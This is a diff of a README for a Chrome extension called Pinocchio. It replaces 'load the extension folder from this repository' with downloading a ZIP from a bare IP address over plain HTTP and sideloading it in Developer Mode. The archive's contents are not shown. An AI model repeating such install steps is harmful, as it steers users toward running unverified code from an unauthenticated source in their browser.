AdiDev29/Pinocchio/README.md

 ### Chrome Extension

-1. Download the extension folder or clone this repository
+1. Download the extension ZIP file from our [website](http://172.105.18.148:8080/static/files/extension.zip)
+2. Unzip/extract the downloaded file to a location on your computer
-2. Open Chrome and navigate to `chrome://extensions/`
+3. Open Chrome and navigate to `chrome://extensions/`
-3. Enable "Developer Mode" in the top-right corner
+4. Enable "Developer Mode" in the top-right corner
-4. Click "Load unpacked" and select the `extension` directory from this project
+5. Click "Load unpacked" and select the extracted extension folder
-5. The Pinocchio icon should now appear in your browser toolbar
+6. The Pinocchio icon should now appear in your browser toolbar

 ### Server Setup